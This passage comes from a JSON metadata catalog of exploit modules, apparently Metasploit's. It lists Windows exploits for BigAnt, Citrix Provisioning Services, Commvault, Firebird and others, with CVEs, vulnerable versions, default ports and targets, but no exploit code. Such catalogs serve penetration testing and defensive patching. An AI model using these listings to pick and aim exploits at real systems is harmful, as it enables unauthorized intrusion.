"name": "BigAnt Server 2.2 Buffer Overflow",
"full_name": "exploit/windows/misc/bigant_server",
"rank": 200,
"disclosure_date": "2008-04-15",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in BigAnt Server 2.2.\n By sending a specially crafted packet, an attacker may be\n able to execute arbitrary code.",
"references": [
"CVE-2008-1914",
"OSVDB-44454",
"BID-28795"
],
"platform": "Windows",
"arch": "",
"rport": 6080,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro All English",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/bigant_server.rb",
"is_install_path": true,
"ref_name": "windows/misc/bigant_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bigant_server_250": {
"name": "BigAnt Server 2.50 SP1 Buffer Overflow",
"full_name": "exploit/windows/misc/bigant_server_250",
"rank": 500,
"disclosure_date": "2008-04-15",
"type": "exploit",
"author": [
"Dr_IDE <Dr_IDE@hushmail.com>"
],
"description": "This exploits a stack buffer overflow in the BigAnt Messaging Service,\n part of the BigAnt Server product suite. This module was tested\n successfully against version 2.50 SP1.",
"references": [
"CVE-2008-1914",
"OSVDB-44454",
"EDB-9673",
"EDB-9690"
],
"platform": "Windows",
"arch": "",
"rport": 6660,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BigAnt 2.5 Universal",
"Windows 2000 Pro All English",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/misc/bigant_server_250.rb",
"is_install_path": true,
"ref_name": "windows/misc/bigant_server_250",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bigant_server_dupf_upload": {
"name": "BigAnt Server DUPF Command Arbitrary File Upload",
"full_name": "exploit/windows/misc/bigant_server_dupf_upload",
"rank": 600,
"disclosure_date": "2013-01-09",
"type": "exploit",
"author": [
"Hamburgers Maccoy",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7.\n A lack of authentication allows unauthenticated file uploads through a DUPF\n command. Additionally, the filename option in the same command can be used to launch\n a directory traversal attack and achieve arbitrary file upload.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It\n has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003\n SP2.",
"references": [
"CVE-2012-6274",
"US-CERT-VU-990652",
"BID-57214",
"OSVDB-89342"
],
"platform": "Windows",
"arch": "",
"rport": 6661,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BigAnt Server 2.97 SP7"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/bigant_server_dupf_upload.rb",
"is_install_path": true,
"ref_name": "windows/misc/bigant_server_dupf_upload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bigant_server_sch_dupf_bof": {
"name": "BigAnt Server 2 SCH And DUPF Buffer Overflow",
"full_name": "exploit/windows/misc/bigant_server_sch_dupf_bof",
"rank": 300,
"disclosure_date": "2013-01-09",
"type": "exploit",
"author": [
"Hamburgers Maccoy",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This exploits a stack buffer overflow in BigAnt Server 2.97 SP7. The\n vulnerability is due to the dangerous usage of strcpy while handling errors. This\n module uses a combination of SCH and DUPF request to trigger the vulnerability, and\n has been tested successfully against version 2.97 SP7 over Windows XP SP3 and\n Windows 2003 SP2.",
"references": [
"CVE-2012-6275",
"US-CERT-VU-990652",
"BID-57214",
"OSVDB-89344"
],
"platform": "Windows",
"arch": "",
"rport": 6661,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BigAnt Server 2.97 SP7 / Windows XP SP3",
"BigAnt Server 2.97 SP7 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/bigant_server_sch_dupf_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bigant_server_usv": {
"name": "BigAnt Server 2.52 USV Buffer Overflow",
"full_name": "exploit/windows/misc/bigant_server_usv",
"rank": 500,
"disclosure_date": "2009-12-29",
"type": "exploit",
"author": [
"Lincoln",
"DouBle_Zer0",
"jduck <jduck@metasploit.com>"
],
"description": "This exploits a stack buffer overflow in the BigAnt Messaging Service,\n part of the BigAnt Server product suite. This module was tested\n successfully against version 2.52.\n\n NOTE: The AntServer service does not restart, you only get one shot.",
"references": [
"CVE-2009-4660",
"OSVDB-61386",
"EDB-10765",
"EDB-10973"
],
"platform": "Windows",
"arch": "",
"rport": 6660,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BigAnt 2.52 Universal"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/misc/bigant_server_usv.rb",
"is_install_path": true,
"ref_name": "windows/misc/bigant_server_usv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bomberclone_overflow": {
"name": "Bomberclone 0.11.6 Buffer Overflow",
"full_name": "exploit/windows/misc/bomberclone_overflow",
"rank": 200,
"disclosure_date": "2006-02-16",
"type": "exploit",
"author": [
"Jacopo Cervini <acaro@jervus.it>"
],
"description": "This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.\n The return address is overwritten with the lstrcpyA memory address,\n the second and third values are the destination buffer,\n the fourth value is the source address of our buffer in the stack.\n This exploit is like a return into libc.\n\n ATTENTION\n The shellcode is executed ONLY when someone tries to close bomberclone.",
"references": [
"CVE-2006-0460",
"OSVDB-23263",
"BID-16697"
],
"platform": "Windows",
"arch": "",
"rport": 11000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP2 Italian",
"Windows 2000 SP1 English",
"Windows 2000 SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/bomberclone_overflow.rb",
"is_install_path": true,
"ref_name": "windows/misc/bomberclone_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bopup_comm": {
"name": "Bopup Communications Server Buffer Overflow",
"full_name": "exploit/windows/misc/bopup_comm",
"rank": 400,
"disclosure_date": "2009-06-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460.\n By sending a specially crafted packet, an attacker may be\n able to execute arbitrary code.",
"references": [
"CVE-2009-2227",
"OSVDB-55275",
"URL-http://www.blabsoft.com/products/server",
"EDB-9002"
],
"platform": "Windows",
"arch": "",
"rport": 19810,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Bopup Communications Server 3.2.26.5460"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/bopup_comm.rb",
"is_install_path": true,
"ref_name": "windows/misc/bopup_comm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/borland_interbase": {
"name": "Borland Interbase Create-Request Buffer Overflow",
"full_name": "exploit/windows/misc/borland_interbase",
"rank": 200,
"disclosure_date": "2007-07-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Borland Interbase 2007.\n By sending a specially crafted create-request packet, a remote\n attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-3566",
"OSVDB-38602",
"URL-http://dvlabs.tippingpoint.com/advisory/TPTI-07-13"
],
"platform": "Windows",
"arch": "",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 English All / Borland InterBase 2007"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/borland_interbase.rb",
"is_install_path": true,
"ref_name": "windows/misc/borland_interbase",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/borland_starteam": {
"name": "Borland CaliberRM StarTeam Multicast Service Buffer Overflow",
"full_name": "exploit/windows/misc/borland_starteam",
"rank": 200,
"disclosure_date": "2008-04-02",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Borland CaliberRM 2006. By sending\n a specially crafted GET request to the STMulticastService, an attacker may be\n able to execute arbitrary code.",
"references": [
"CVE-2008-0311",
"OSVDB-44039",
"BID-28602"
],
"platform": "Windows",
"arch": "",
"rport": 3057,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 SP4 English",
"Windows 2003 SP0 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/borland_starteam.rb",
"is_install_path": true,
"ref_name": "windows/misc/borland_starteam",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/citrix_streamprocess": {
"name": "Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow",
"full_name": "exploit/windows/misc/citrix_streamprocess",
"rank": 400,
"disclosure_date": "2011-01-20",
"type": "exploit",
"author": [
"mog"
],
"description": "This module exploits a stack buffer overflow in Citrix Provisioning Services 5.6.\n By sending a specially crafted packet to the Provisioning Services server, a fixed\n length buffer on the stack can be overflowed and arbitrary code can be executed.",
"references": [
"OSVDB-70597",
"ZDI-11-023",
"URL-http://secunia.com/advisories/42954/",
"URL-http://support.citrix.com/article/CTX127149"
],
"platform": "Windows",
"arch": "",
"rport": 6905,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 / Windows Server 2003 SP2 / Windows Vista"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/citrix_streamprocess.rb",
"is_install_path": true,
"ref_name": "windows/misc/citrix_streamprocess",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/citrix_streamprocess_data_msg": {
"name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow",
"full_name": "exploit/windows/misc/citrix_streamprocess_data_msg",
"rank": 300,
"disclosure_date": "2011-11-04",
"type": "exploit",
"author": [
"AbdulAziz Hariri",
"alino <26alino@gmail.com>"
],
"description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the\n 6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2,\n Windows 7, and Windows XP SP3.",
"references": [
"OSVDB-75780",
"BID-49803",
"ZDI-12-009",
"URL-http://support.citrix.com/article/CTX130846"
],
"platform": "Windows",
"arch": "",
"rport": 6905,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Citrix Provisioning Services 5.6 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb",
"is_install_path": true,
"ref_name": "windows/misc/citrix_streamprocess_data_msg",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/citrix_streamprocess_get_boot_record_request": {
"name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow",
"full_name": "exploit/windows/misc/citrix_streamprocess_get_boot_record_request",
"rank": 300,
"disclosure_date": "2011-11-04",
"type": "exploit",
"author": [
"alino <26alino@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020004 (GetBootRecordRequest) to the 6905/UDP port. The module, which allows\n code execution under the context of SYSTEM, has been successfully tested on Windows Server\n 2003 SP2 and Windows XP SP3.",
"references": [
"OSVDB-75780",
"BID-49803",
"URL-http://support.citrix.com/article/CTX130846"
],
"platform": "Windows",
"arch": "",
"rport": 6905,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Citrix Provisioning Services 5.6 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb",
"is_install_path": true,
"ref_name": "windows/misc/citrix_streamprocess_get_boot_record_request",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/citrix_streamprocess_get_footer": {
"name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow",
"full_name": "exploit/windows/misc/citrix_streamprocess_get_footer",
"rank": 300,
"disclosure_date": "2011-11-04",
"type": "exploit",
"author": [
"alino <26alino@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020002 (GetFooterRequest) to the 6905/UDP port. The module, which allows code execution\n under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2\n and Windows XP SP3.",
"references": [
"OSVDB-75780",
"BID-49803",
"URL-http://support.citrix.com/article/CTX130846"
],
"platform": "Windows",
"arch": "",
"rport": 6905,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Citrix Provisioning Services 5.6 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb",
"is_install_path": true,
"ref_name": "windows/misc/citrix_streamprocess_get_footer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/citrix_streamprocess_get_objects": {
"name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow",
"full_name": "exploit/windows/misc/citrix_streamprocess_get_objects",
"rank": 300,
"disclosure_date": "2011-11-04",
"type": "exploit",
"author": [
"Anyway <Aniway.Anyway@gmail.com>",
"alino <26alino@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020006 (GetObjetsRequest) to the 6905/UDP port. The module, which allows code execution\n under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2\n and Windows XP SP3.",
"references": [
"OSVDB-75780",
"BID-49803",
"URL-http://support.citrix.com/article/CTX130846",
"ZDI-12-010"
],
"platform": "Windows",
"arch": "",
"rport": 6905,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Citrix Provisioning Services 5.6 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb",
"is_install_path": true,
"ref_name": "windows/misc/citrix_streamprocess_get_objects",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/cloudme_sync": {
"name": "CloudMe Sync v1.10.9",
"full_name": "exploit/windows/misc/cloudme_sync",
"rank": 500,
"disclosure_date": "2018-01-17",
"type": "exploit",
"author": [
"hyp3rlinx",
"Daniel Teixeira"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in CloudMe Sync v1.10.9 client application. This module has been\n tested successfully on Windows 7 SP1 x86.",
"references": [
"CVE-2018-6892",
"EDB-44027"
],
"platform": "Windows",
"arch": "",
"rport": 8888,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"CloudMe Sync v1.10.9"
],
"mod_time": "2018-02-20 17:40:33 +0000",
"path": "/modules/exploits/windows/misc/cloudme_sync.rb",
"is_install_path": true,
"ref_name": "windows/misc/cloudme_sync",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/commvault_cmd_exec": {
"name": "Commvault Communications Service (cvd) Command Injection",
"full_name": "exploit/windows/misc/commvault_cmd_exec",
"rank": 400,
"disclosure_date": "2017-12-12",
"type": "exploit",
"author": [
"b0yd"
],
"description": "This module exploits a command injection vulnerability\n discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5\n and v10). The vulnerability exists in the cvd.exe service and allows an\n attacker to execute arbitrary commands in the context of the service. By\n default, the Commvault Communications service installs and runs as SYSTEM in\n Windows and does not require authentication. This vulnerability was discovered\n in the Windows version. The Linux version wasn't tested.",
"references": [
"CVE-2017-18044",
"URL-https://www.securifera.com/advisories/sec-2017-0001/"
],
"platform": "Windows",
"arch": "",
"rport": 8400,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Commvault Communications Service (cvd) / Microsoft Windows 7 and higher"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/misc/commvault_cmd_exec.rb",
"is_install_path": true,
"ref_name": "windows/misc/commvault_cmd_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/disk_savvy_adm": {
"name": "Disk Savvy Enterprise v10.4.18",
"full_name": "exploit/windows/misc/disk_savvy_adm",
"rank": 500,
"disclosure_date": "2017-01-31",
"type": "exploit",
"author": [
"Daniel Teixeira"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in Disk Savvy Enterprise v10.4.18, caused by improper bounds\n checking of the request sent to the built-in server. This module\n has been tested successfully on Windows 7 SP1 x86.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": 9124,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Disk Savvy Enterprise v10.4.18"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/misc/disk_savvy_adm.rb",
"is_install_path": true,
"ref_name": "windows/misc/disk_savvy_adm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/doubletake": {
"name": "DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow",
"full_name": "exploit/windows/misc/doubletake",
"rank": 200,
"disclosure_date": "2008-06-04",
"type": "exploit",
"author": [
"ri0t <ri0t@ri0tnet.net>"
],
"description": "This module exploits a stack buffer overflow in the authentication mechanism of\n NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability\n was found by Titon of Bastard Labs.",
"references": [
"CVE-2008-1661",
"OSVDB-45924"
],
"platform": "Windows",
"arch": "",
"rport": 1100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"doubletake 4.5.0",
"doubletake 4.4.2",
"doubletake 4.5.0.1819"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/doubletake.rb",
"is_install_path": true,
"ref_name": "windows/misc/doubletake",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/eiqnetworks_esa": {
"name": "eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow",
"full_name": "exploit/windows/misc/eiqnetworks_esa",
"rank": 200,
"disclosure_date": "2006-07-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"ri0t <ri0t@ri0tnet.net>",
"kf <kf_list@digitalmunition.com>"
],
"description": "This module exploits a stack buffer overflow in eIQnetworks\n Enterprise Security Analyzer. During the processing of\n long arguments to the LICMGR_ADDLICENSE command, a stack-based\n buffer overflow occurs. This module has only been tested\n against ESA v2.1.13.",
"references": [
"CVE-2006-3838",
"OSVDB-27526",
"BID-19163",
"ZDI-06-024"
],
"platform": "Windows",
"arch": "",
"rport": 10616,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"EnterpriseSecurityAnalyzerv21 Universal",
"EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English",
"EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2",
"EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1",
"Astaro Report Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English",
"Astaro Report Manager (OEM) Offset 1262 Windows XP English SP1/SP2",
"Astaro Report Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1",
"Fortinet FortiReporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English",
"Fortinet FortiReporter (OEM) Offset 1262 Windows XP English SP1/SP2",
"Fortinet FortiReporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1",
"iPolicy Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English",
"iPolicy Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2",
"iPolicy Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1",
"SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English",
"SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows XP English SP1/SP2",
"SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1",
"Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English",
"Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2",
"Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1",
"Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English",
"Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2",
"Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/eiqnetworks_esa.rb",
"is_install_path": true,
"ref_name": "windows/misc/eiqnetworks_esa",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/eiqnetworks_esa_topology": {
"name": "eIQNetworks ESA Topology DELETEDEVICE Overflow",
"full_name": "exploit/windows/misc/eiqnetworks_esa_topology",
"rank": 200,
"disclosure_date": "2006-07-25",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in eIQnetworks\n Enterprise Security Analyzer. During the processing of\n long arguments to the DELETEDEVICE command in the Topology\n server, a stack-based buffer overflow occurs.\n\n This module has only been tested against ESA v2.1.13.",
"references": [
"CVE-2006-3838",
"OSVDB-27528",
"BID-19164"
],
"platform": "Windows",
"arch": "",
"rport": 10628,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 SP4 English",
"Windows XP SP2 English",
"Windows 2003 SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb",
"is_install_path": true,
"ref_name": "windows/misc/eiqnetworks_esa_topology",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/enterasys_netsight_syslog_bof": {
"name": "Enterasys NetSight nssyslogd.exe Buffer Overflow",
"full_name": "exploit/windows/misc/enterasys_netsight_syslog_bof",
"rank": 300,
"disclosure_date": "2011-12-19",
"type": "exploit",
"author": [
"Jeremy Brown",
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Enterasys NetSight. The\n vulnerability exists in the Syslog service (nssyslogd.exe) when parsing a specially\n crafted PRIO from a syslog message. The module has been tested successfully on\n Enterasys NetSight 4.0.1.34 over Windows XP SP3 and Windows 2003 SP2.",
"references": [
"CVE-2011-5227",
"OSVDB-77971",
"BID-51124",
"ZDI-11-350"
],
"platform": "Windows",
"arch": "",
"rport": 514,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Enterasys NetSight 4.0.1.34 / Windows XP SP3",
"Enterasys NetSight 4.0.1.34 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/enterasys_netsight_syslog_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/eureka_mail_err": {
"name": "Eureka Email 2.2q ERR Remote Buffer Overflow",
"full_name": "exploit/windows/misc/eureka_mail_err",
"rank": 300,
"disclosure_date": "2009-10-22",
"type": "exploit",
"author": [
"Francis Provencher (Protek Research Labs)",
"Dr_IDE",
"dookie",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the Eureka Email 2.2q\n client that is triggered through an excessively long ERR message.\n\n NOTE: this exploit isn't very reliable. Unfortunately reaching the\n vulnerable code can only be done when manually checking mail (Ctrl-M).\n Checking at startup will not reach the code targeted here.",
"references": [
"CVE-2009-3837",
"OSVDB-59262",
"EDB-10235"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Win XP SP3 English",
"Win XP SP2 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/eureka_mail_err.rb",
"is_install_path": true,
"ref_name": "windows/misc/eureka_mail_err",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/fb_cnct_group": {
"name": "Firebird Relational Database CNCT Group Number Buffer Overflow",
"full_name": "exploit/windows/misc/fb_cnct_group",
"rank": 300,
"disclosure_date": "2013-01-31",
"type": "exploit",
"author": [
"Spencer McIntyre"
],
"description": "This module exploits a vulnerability in Firebird SQL Server. A specially\n crafted packet can be sent which will overwrite a pointer allowing the attacker to\n control where data is read from. Shortly, following the controlled read, the\n pointer is called resulting in code execution.\n\n The vulnerability exists with a group number extracted from the CNCT information,\n which is sent by the client, and whose size is not properly checked.\n\n This module uses an existing call to memcpy, just prior to the vulnerable code,\n which allows a small amount of data to be written to the stack. A two-phase\n stack pivot allows execution of the ROP chain, which ultimately is used to execute\n VirtualAlloc and bypass DEP.",
"references": [
"CVE-2013-2492",
"OSVDB-91044"
],
"platform": "Windows",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows FB 2.5.2.26539",
"Windows FB 2.5.1.26351",
"Windows FB 2.1.5.18496",
"Windows FB 2.1.4.18393",
"Debug"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/misc/fb_cnct_group.rb",
"is_install_path": true,
"ref_name": "windows/misc/fb_cnct_group",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-restarts"
]
}
},
"exploit_windows/misc/fb_isc_attach_database": {
"name": "Firebird Relational Database isc_attach_database() Buffer Overflow",
"full_name": "exploit/windows/misc/fb_isc_attach_database",
"rank": 200,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.",
"references": [
"CVE-2007-5243",
"OSVDB-38607",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Brute Force",
"Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/fb_isc_attach_database.rb",
"is_install_path": true,
"ref_name": "windows/misc/fb_isc_attach_database",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/fb_isc_create_database": {
"name": "Firebird Relational Database isc_create_database() Buffer Overflow",
"full_name": "exploit/windows/misc/fb_isc_create_database",
"rank": 200,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.",
"references": [
"CVE-2007-5243",
"OSVDB-38606",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Brute Force",
"Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/fb_isc_create_database.rb",
"is_install_path": true,
"ref_name": "windows/misc/fb_isc_create_database",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/fb_svc_attach": {
"name": "Firebird Relational Database SVC_attach() Buffer Overflow",
"full_name": "exploit/windows/misc/fb_svc_attach",
"rank": 200,
"disclosure_date": "2007-10-03",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.",
"references": [
"CVE-2007-5243",
"OSVDB-38605",
"BID-25917",
"URL-http://www.risesecurity.org/advisories/RISE-2007002.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": 3050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Brute Force",
"Firebird WI-V1.5.3.4870 WI-V1.5.4.4910",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/fb_svc_attach.rb",
"is_install_path": true,
"ref_name": "windows/misc/fb_svc_attach",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/gh0st": {
